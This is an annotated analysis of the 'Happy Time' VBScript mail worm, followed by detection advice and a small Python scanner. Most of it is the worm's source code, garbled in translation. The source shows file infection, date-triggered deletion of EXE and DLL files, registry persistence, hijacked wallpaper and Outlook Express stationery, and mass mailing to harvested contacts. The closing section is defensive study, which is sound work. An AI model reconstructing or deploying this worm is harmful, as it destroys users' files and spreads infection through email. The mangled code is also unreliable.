"Happy Time" Code Analysis
Sub mload () on error resume nextmpath = GRF () set OS = createObject ("scripTlet.Typelib") set oh = createObject ("shell.application") 'Establish an enumeration object, avoiding security audit if ishtml daml Then' call Ishtml function, if it is html, lowercase ... murl = LCase (Document.Location) if mpath = "" ThenOS.Reset Os.path = "c: /help.htm" os.doc = lhtml () Os.Write If mpath is empty, generate help.htmihtml = "" "under the C: hypertext content, and point to C: /Help.htmcall Document.Body.insertadjacenTml (" Afterbegin ", IHTML) Elseif IV (MPath, "Help.vbs") THENSETINTERVAL "RT ()", 10000ELSEM = "HTA" if Lcase (M) = Right (MURL, LEN (M)) THENID = setTimeout ("Mclose ()", 1) Set Timeout Condition Mainelse Os.reset () os.path = mpath & "os.doc = lhtml () os.write () iv mpath," Help.hta "" Generate Help.htaend IFEND IFELSEMAIN " No, it is implemented in the main function end imp "********************************************************************************************************************************************************************** ************************** The following is the main function, too long! Sub main () On Error Resume NextSet Of = CreateObject ( "Scripting.FileSystemObject") 'Needless to say, FileSystemObject object to create it Set Od = CreateObject ( "Scripting.Dictionary")' Create a Dictionary object, used to store data and key projects It is actually a relatively open array odd "html", "1100" OD.Add "VBS", "0100" Od.Add "HTM", "1100" OD.Add "ASP", "0010" 'Add to Dictionary objects to the item to be infected with Ks = "hkey_current_user / software /"' use variables to reduce code length DS = GRF () CS = GSF () if isvbs dam if it is VBS if.fileexists ("C: / Help.htm ") Then of.deletefile (" c: / Help.htm ") 'If c: /help.htm exists, delete, eliminate the legacy = CINT (Month (Date)
Day (Date)) if key = 13 Then 'If the month and the sum of the days are 13 (this is also a variant reason - change 13 to other numbers) Od.RemoveAllod.Add "EXE", "0001" OD.ADD "DLL", "0001" 'clear the Dictionary array and adds the exe, DLL to the Dictionary object, with the deletion of END IFCN = RG (KS & "Help / Count")' read the HKEY_CURRENT_USER in the registry / SOFTWARE / HELP / COUNT key value if cn = "" ", if count is 0, set to 1END IFRW KS &" Help / Count ", CN 1 'Add HKEY_CURRENT_USER / SOFTWARE / HELP / COUNT key value, Value 2f1 = rg (KS & "Help / filename") ')' Reread HKEY_CURRENT_USER / SOFTWARE / HELP / FileName key value F2 = FNEXT (OF, OD, F1) 'Get file name FEXT = getext (OF, OD) , F2) 'Get the code of the file extension RW Ks & "Help / filename", F2' Add key value if isdel (fEXT) THEN 'If the fourth character of the extension is 1 - ie 0001 (EXE, DLL) F3 = f2 'Storage file name F2 = FNEXT (OD, F2)' Get file names of files? RW Ks & "Help / filename", F2 'Write Registry Of.deletefile F3' Delete File Elseif Lcase (wscript.scriptfullname) <> LCase (f2) Then 'If not the files in the collection FW, F2, FEXTEND IFEND IFIF (CINT (CN) MOD 366) = 0 THENIF (CINT (SECOND (TIME)) MOD 2) = 0 THEN 'to force conversion using the CINT function, and send mail tsendelseadds = oMsend (add) end ifend ifwp = rg ("HKEY_CURENT_USER / Control Panel / Desktop / Wallpaper ") IF RG (KS &" Help / Wallpaper ") <> wp or wp =" "The 'compares desktop wallpaper has changed if wp =" ""1 =" "N3 = CS &" / Help.htm "elsemp = of.getfile (wp) .parentFoldern1 = of.getFileName (WP) N2 = of.GetBaseName (WP) N3 = CS &" / "& n2 &" .htm "end ifset pfc = of.createtextfile (N3, TRUE) MT = SA ("1100") 'Creating a super text PFC.Write "<" & "html> <" & "
Body BGColor = '# 007f7f' background = '"& n1 &"> <"&" / body> <"/ html>" & MT' hyperclic content PFC.Closerw Ks & "Help / Wallpaper", N3RW "HKEY_CURRENT_USER / Control Panel / Desktop / Wallpaper", N3 'Sets poisoned hypertext set to active desktop END IFELSESET FC = Of.CreatetextFile (DS & "/ Help.vbs", true) fc.write sa ("0100 ") 'Creating VBS file fc.closebf = cs &" /untitled.htm"set fc2 = of.createtextFile (bf, true) fc2.write lhtmlfc2.close' Create Untitled.htmoEID under Windows ("HKEY_CURRENT_USER / IDENTIES / Default user ID ") OE =" HKEY_CURRENT_USER / IDentities / "& Oeid &" / SOFTWARE / Microsoft / Outlook Express / 5.0 / Mail "MSH = OE &" / Message Send HTML "Cus = OE &" / Compose Usenessery " SN = oe & "/ Stationery Name" Rw MSH, 1Rw CUS, 1Rw SN, bf 'in Hkey_Current_User\Identities\ {AECF6CA3-9614-4AF4-AEF2-CT63FE9D97A4} was added three times \Software\Microsoft\Outlook Express\5.0\Mail Key value message send html, compose use stationry, and stationery, the first two values are 1, the latter point to windows / ust.htmweb = cs & "/ web" set gf = of.getfolder (web) .files' The file odd.add "htt" in the Windows / Web folder, "1100" 'adds HTT project to Dictionary to for EAC HM in GF 'Traversing each file under Windows / Web FEXT = getExt (OD, M)' gets the extension of each file if Fext <> "" If the extension is not empty, fW is, fW of, M, FEXTEND IFNEXTEND IFEND SUB '**************************************************** ************************ SUB MCLOSE () Document.write "&" Title> I am Sorry! 'Write I am Sorry and close .
With this as a marker for infection, WINDOW.CLOSEEND SUB '*************************************************************************************************************** ************************************** SUB FW (of, s, n) 'This time S is the file name, n is the file extension Name DIM FC, FC2, M, MMAIL, MTON Error Resume NextSet FC = Of.OpenTextFile (S, 1) 'read-only mode Open this file MT = fc.readall' Read all file stream fc.close 'Off file if not Not Not NOT SC (MT) THEN 'If the mmail = ml (MT) MT = SA (N) set fc2 = of.opEntextFile (s, 8)' opens the file and writes the write operation in the end of the file FC2.Write MTFC2.Closemsend ( Mmail) 'hair poison mail end ingnd sub' ************************************************** ************************** FUNCTION SC (S) Mn = "Rem I am Sorry! Happy Time" if IF INSTR (S, MN) > 0 THEN 'If there is a Rem I am Sorry! Happy Timesc = true elsesc = false' in the read file stream, returning True, otherwise false ifend function '********** *********************************************************** ***** Function FNEXT (Of, OD, S) DIM FPATH, FNAME, FEXT, T, GFON Error ResMe nextfname = "" T = false 'Initialization Variable IF OF OLEEXISTS (S) Then' If S exists in the current FPATH = 0.GETFILE (s) .ParentFolder 'Get the file's parent directory name fname = s' Get file name Elseif butfoldeRexists (s) THEN' does not exist in the current folder, get the directory name fpath = ST = Trueelsefpath = DNEXT (of, "" ) 'Get the current drive - the root directory end ifdo while trueSet GF = of.getfolder (files "Get all file objects in the current directory for Each M in GF' Traversing Each file If Thenif getExt (of , Od, m) <> "" If the file is a file name in the file collection, it returns the file name, for the function or process used - infected or deleted exit functionend iFelseif Lcase (M ) = Lcase (fname) or fname = "" "" If there is no file T = TrueEnd ifXTfpath = pnext (of, fpath) 'Loopend Function' ******************** 
****************************************************** Function PNEXT ( Of, s) on Error ResMe nextddim PPath, NPath, GP, PN, T, MT =
Falseif Of.FoldEREXISTS (S) Then 'If there is set gp = of.getfolder if the specified folder exists, you get the number of sub-directory pn = gp.countif pn = 0 Then' If there is no child directory PPath = LCase (S) 'npath = lcase (of.getParentFoldername (s))' Gets the lowercase form of the parent directory T = Trueelsenpath = LCase (s) 'has a subdirectory, get the collection of its lowercase End ifdo While Not Er' for Each PN IN OF Of.GetFolder (npath). Subfolders 'Get subdirectory in subdirectory if Thenif ppath = lcase (pn) THENT = false = lcase (pn) exit functionend ifxt = trueppath = lcase (npath)' Transforms strings Small write npath = of.getParentFoldername (npath) 'IF of.getFolder (ppath) .Istfolder the' If it is root directory m = of.getdrivename (ppath) to get partitioned PNEXT = DNEXT (OF, M) EXIT FUNCTIONEND IFLOOPEND IFEND FUNCTION '********************************************************************************************************************************** ******************* FUNCTION DNEXT (OF, S) DIM DC, N, D, T, MON Error ResMe nextt = falsem = "" SET DC = of.drives 'Get all drive letter for Each D in DC' Traversed Each Drive If D.DriveType = 2 or D.DriveType = 3 TEN 'If it is a network disk or local disk if t thendnext = dexit function' If it is false, Returns the current disk, and exits this function elseif lcase (s) = lcase (d), if it is true and the same is the same, the T is TRUET = Trueen Di IFIF M = "" "If M is empty, pay the disk to mm = dend ifend ifnd ifnextdDNext = m 'return drive end function' **************** *********************************************************** Function getExt (OD, S) DIM FEXTON ERROR Resume NextFext = LCASE (OF.GETEXTENSITIONNAME (SGETEXTENSITIONNAME (SGETEXTENSITIONNAME (s)) 'Returns the lowercase getExt = OD.ID.Id.Id.Id.Id.Id.Id.item (fEXT)' for the Dictionary object. Item, 0001 (exe), etc. 
End function '************************************************************ ************************************ SUB RW (K, V) 'Write Registry DIM RON Error ResMe NextSet R = CREATEOBJECT ("
Wscript.shell ") 'Create an object R.Regwrite K, vend sub' ************************************************************* ******************************************* FUNCTION RG (V) 'Read Registry DIM RON Error Resume NextSet R = CREATEOBJECT "Wscript.shell") 'Create an object RG = R.REGREAD (V) end function' ************************************************** ********************************************* FUNCTION ISVBS () 'This function is determined whether it is VBS file Dim errteston Error resume nexterrtest = wscript.scriptfullnameif err Then 'If an error is wrong, it is not vbsisvbs = falseelseisvbs = trueEnd ifend function' ******************************************************************* *********************************************** FUNCTION ISHTML () "This function is judged to be HTML Document DIM Errteston error resume nexterrtest = Document.locationif er thnishtml = false 'If an error, it is not a hypertext elseishtml = truend impSeishtml = truend impuND Function' ****************************** ***************************************************** Function ismail (s) ' This function is not a mail address DIM M1, M2ISMAIL = FALSEIF INSTR (S, VBCRLF) = 0 THEN 'Returns the position where VBCRLF in S is the first time, VBCRLF is a wrap M1 = INSTR (S, "@") M2 = INSTR (s, ") IF m1 <> 0 and m1 & "<" & "Title> Help" <"&" body> "& lscript (lvbs ()) & vbcrlf & _ <" & "/ body> end function" ********* *********************************************************** ******* Function Lscript (s) 'Writing VBScript Declaration Lscript = "<" Script Language =' Vbscript '> "& Vbcrlf & _s &" <"/ Script" & ">" End function '****************************************************************** ******************* Function SL (S1, S2, N) DIM L1, L2, L3, IL1 = LEN (S1) 'Getting the length of the file stream L2 = LEN (S2) 'Get Mailto: Length I = INSTR (S1, S2)' During the file stream: The first appearance position-value is a number if i> 0 Then 'finds a string operation L3 = I L2 - 
1IF N = 0 THENSL = Left (S1, I - 1) Elseif N = 1 Tensl = Right (S1, L1 - L3) end ifelsesl = "" "end ifnd function" ******* *********************************************************** ******** Function OG () 'Get the mail address DIM i, N, M (), OOM, OOSet OO = CreateObject ("Outlook.Application")' creation Outlook Application Objects, Outlook and Outlook Express can't run off! Set om = oo.getnamespace ("MAPI"). GetDefaultfolder (10) .Itemsn = om.countredim m (n) for i = 1 to nm (i - 1) = Om.item (i) .Email1address gets the email address in each WAB NEXTOG = Mend function '*********************************************************************************************************************************************************************************************************************************************************************************************** ******************* SUB Tsend () 'Hair Toxic Mail DIM OD, MS, MM, A, MSET OD = CREATEOBJECT ("Scripting.Dictionary") MConnect MS , Mmmm.fetchsorted = truemm.fetchfor i = 0 to mm.msgcount - 1mm.msgindex = IA = mm.msgorigaddressif Od.Item (a) = "" THENOD.ITEM (a) = Mm.msgsubjects Ifr.MsgSubjectFor Each M in in ket.keysmm.com = "fw:" & od.Item (m) Set Mail Title mm.recipaddress = m 'This message mm.attachmentPathname = GSF & "/Untitled.htm" 'Add attachment Windows / UnTID.htmmm.send' Send! NEXTMS.SIGNOFFEND SUB '****************************************************************************************** ***************************** Function Er () 'Setup error traps, avoiding program crash, rigorous style is worth learning if err.number = 0 thener = falseelseerr. 
Clearer = truend ifend function '*********************************************************** ********************** FUNCTION Isdel (s) 'This function views whether the current file is the file type IF MID (S, 4, 1) = 1 THEN 'Look at the fourth character of S is 1 - 0001 (exe and dll) isdel = true', if it returns True, returning elsendel = false ', if not, return false ifend function' *** *********************************************************** ************

The comments above cover only the technically novel and important modules, for everyone to study and learn from. From the code you can see that "Happy Time" also uses the same FileSystemObject (file system object) technique as the "Love" virus, which is an almost indispensable part of every VBS mail virus. So if anti-virus software monitors the FileSystemObject keyword in all HTML and VBS files, it can catch all of these viruses and their potential variants (some legitimate hypertext and VBS files may be flagged by mistake, but a false alarm is still better than letting a virus through). If it monitors only keywords such as "I Love You" or "Happy Time", a variant is easy to make: the title, the content and the variable names in the source code are replaced, the "smart" anti-virus software is left helpless, and the virus spreads.

If you are using Foxmail 3.x, congratulations! Foxmail 3.0 and later strictly separates plain-text messages from hypertext messages; by default, viewing a hypertext message requires clicking the small globe icon in the right corner. If you suspect a message may be infected, you can delete it, or export it to an ASCII file and open it in Notepad to study it. Older versions of Foxmail, and Outlook Express, are not so lucky: merely viewing the title is enough, and OE becomes a source of infection that sends out infected mail.
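The trade-off described above, as an added example that is not part of the original page: a fixed-string signature on the worm's marker misses a renamed variant, while the FileSystemObject keyword rule catches it and also flags a harmless admin script. The sample fragments are constructed and inert, and the companion-object score is an assumption added here to rank keyword hits.

```python
import re
from pathlib import PurePath

# File types the listing's Dictionary marks for infection.
SCRIPT_EXTS = {".htm", ".html", ".vbs", ".asp", ".htt"}
# Rule 1: fixed-string signature (the marker that SC() looks for).
SIGNATURES = ["rem i am sorry! happy time"]
# Rule 2: the keyword rule the text proposes, matched case-insensitively.
FSO = re.compile(r"filesystemobject", re.I)
# Assumption: other objects the listing creates, used only to rank keyword hits.
COMPANIONS = [re.compile(p, re.I) for p in (r"wscript\.shell", r"outlook\.application")]

def scan(name, text):
    """Return (signature_hit, keyword_hit, score) for one file's text."""
    if PurePath(name).suffix.lower() not in SCRIPT_EXTS:
        return (False, False, 0)
    sig = any(s in text.lower() for s in SIGNATURES)
    kw = bool(FSO.search(text))
    score = 1 + sum(1 for c in COMPANIONS if c.search(text)) if kw else 0
    return (sig, kw, score)

# Constructed, inert fragments for illustration (not taken from the worm).
SAMPLES = {
    "original.vbs": 'Rem I am Sorry! Happy Time\n'
                    'Set f = CreateObject("Scripting.FileSystemObject")\n',
    "variant.htm": '<script language="VBScript">\nRem Good morning\n'
                   'Set a = CreateObject("Scripting.FileSystemObject")\n'
                   'Set b = CreateObject("WScript.Shell")\n'
                   'Set c = CreateObject("Outlook.Application")\n</script>\n',
    "admin.vbs": 'Set fso = CreateObject("Scripting.FileSystemObject")\n'
                 'WScript.Echo fso.GetFolder(".").Files.Count\n',
    "page.html": "<html><body>hello</body></html>\n",
    "notes.txt": "FileSystemObject is mentioned here, but .txt is not scanned\n",
}

def report():
    """Scan every constructed sample; returns {name: (sig, kw, score)}."""
    return {name: scan(name, body) for name, body in SAMPLES.items()}

if __name__ == "__main__":
    for name, (sig, kw, score) in report().items():
        print(f"{name:13} signature={sig!s:5} keyword={kw!s:5} score={score}")
```

The admin.vbs result is the false positive the text accepts as the cost of catching variants.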